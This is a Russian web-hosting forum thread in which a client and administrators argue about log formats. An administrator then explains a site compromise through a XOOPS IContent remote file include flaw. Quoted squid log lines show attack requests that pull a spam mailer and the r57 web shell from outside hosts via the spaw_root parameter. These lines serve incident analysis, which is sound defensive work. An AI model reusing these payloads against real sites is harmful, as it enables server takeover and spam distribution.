Net Форумы

[ser_ru]

Это опять я, киддис-манагер
1. snmp - простой протокол управления сетью (В.Г.Олифер Н.А.Олифер Компьютерные сети с152) и к преобразованию mac адресов в символьные имена (канальный уровень модели OSI) никакого отношения не имеет.
2. Ради интереса мне прислали логи и уменя глупый вапрос а где в них время ?
3. От вас Al-x кстати кроме оскарблений ничего тоже не поступило.

Граждане Умные админы рекомендую вам сходить на www.bsdportal.ru - хоть познакомитесь с NIX и почитать В.Г.Олифер Н.А.Олифер Компьютерные сети .

[Al-x]

[dimcha]

[AP]

2ser_ru

Меня, честно говоря, удивляет, что unix админ не знает про unix формат времени. И вы, при этом, рекомендуете нам узнать, что же такое unix?


2Al-x

Там за пару минут можно управиться. У меня, правда, желание уже опубликовать, что и как было.

[Al-x]

[ser_ru]

Покажите очень тупому админу как перевести это в нормальное время :

18664 GET www.satur.ru /modules/news/article.php?storyid=33 - Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) -
1180728467 141.76.45.35 404 486 GET www.satur.ru //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://firp.it/mambots/editors/jce/jscripts/tiny_mce/plugins/fullscreen/images/final.txt? - Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 -
1180728468 141.76.45.34 403

[AP]

1180728106

ap$ date -r 1180728106
Sat Jun 2 00:01:46 MSD 2007



Кстати, логи в формате squid

[ser_ru]

Скажите а как тупые люди должны понимать эти логи если незнают в чем они сгенерированы.

[Al-x]

с другой стороны, наверное будет более гуманно остановить это издевательство над

[AP]

У нас на форуме и, если я не ошибаюсь, на сайте есть информация по поводу формата логов.

[ser_ru]

Не знаю как у вас на Калыме у нас логи обычно выглядит так:

Jun 5 00:00:00 www newsyslog[54384]: logfile turned over due to size>100K
Jun 5 12:26:57 www sshd[56174]: Did not receive identification string from 62.94.144.227
Jun 5 12:29:31 www sshd[56175]: Illegal user admin from 62.94.144.227
Jun 5 12:49:37 www sshd[56215]: Did not receive identification string from 70.43.174.170
Jun 5 12:52:17 www sshd[56219]: Illegal user admin from 70.43.174.170
Jun 5 12:57:30 www sshd[56238]: Did not receive identification string from 216.144.238.152
Jun 5 13:00:07 www sshd[56258]: Illegal user admin from 216.144.238.152
Jun 5 13:00:09 www sshd[56260]: Illegal user admin from 216.144.238.152

[AP]

Я не писал о /var/log/auth или /var/log/messages.
Это хоть на колыме, хоть где угодно формат squid'а

[AP]

Кстати unix time довольно распространен, его используют многие программы на выводе. Правда, сейчас я могу вспомнить только printk в linux kernel на загрузке.

Ну, и естественно, что это внутренний формат времени, который используется программистами, imho как правило, при написании различных программ под unix.

[ser_ru]

Так мы общаемся с учень умными программерами а не админами!

[AP]

Время подходит к 18.00 посему я все же напишу, что и как. Однако, должен отметить, что уважаемый ser_ru вполне справился с задачей, судя по куску лога, который он привел. Это замечательно, и было бы еще замечетельней, если бы с этого все начиналось.


Максим, наколько я вижу, вы убрали с сайта все скрипты в принципе, в том числе и уязвимые, поэтому проблем в связи с указанием мною данной уязвимости не будет:

В логах можно найти следующие строчки:

... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v

... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v -
... POST http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://sigmafotbal.cz/org/mailer.txt?&?=v

Таким образом был разослан спам. У уважаемого LORD'а возник вопрос, каким именно образом взлом одного клиента может нанести ущерб другим клиентам и нам. По-моему акцент на слове спам я же делал. Неужели серьезному администратору трудно сделать соответствующие выводы из этого?

Про то, что столь массавая рассылка спам дает дополнительную нагрузку на сервер можно было бы и не говорить. Лимиты стоят, но тем не менее определенную нагрузку создать можно, учитывая, что у sendmail'а менее строгие правила по кол-ву получателей и т.д., в силу того, что он и предназначен для рассылок (нормальных, разумеется).

Второе, и пожалуй, в данном контексте самое главное. Блок-листы. По-моему сейчас все труднее находить пользователей электронной почты, которые в связи с почтовыми трудностями не слышали этого слова. Системного администратора, в общем случае, тоже. Рассылки спама, в зависимости от их "удачности", могут парализовывать различные почтовые пересылки из-за довольно быстрого попадания сервера в блок-листы. Я ответил на Ваш вопрос по поводу ущерба, г-н LORD?


И наконец, встречается такая строчка, кстати, неоднократно:
... GET http://www.satur.ru:82/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gonfiabiligamespark.it/flash/r57.txt?

r57.txt, думаю, что LORD и ser_ru представлять не надо, но кто-то может и не знать - это тулкит, типа шелла, для выполнения различных комманд на удаленном сервере, который очень любят использовать script kiddies. То есть, с данной уязвимостью на сайте можно сделать все-что угодно. Удалить весь контент, понаставить других закладок в скрипты и прочая.


Информация о самой уязвимости, которую несложно найти, зная какую версию CMS вам поставил вебмастер:

http://www.securityfocus.com/bid/24302/info
XOOPS IContent Module Spaw_Control.Class.PHP Remote File Include Vulnerability

Возможно есть что-то еще из уявимостей, тут уже нужно просто подробнее данным вопросом поинтересоваться.

Максим, у вас есть полный лог за двое полных суток, поэтому вы можете более тщательную проверку провести. На будущее, я бы порекомендовал вам создать у себя папку logs в корне домашнего каталога ( все согласно инструкциям ), тогда при возникновении проблем у вас будут логи за целую неделю.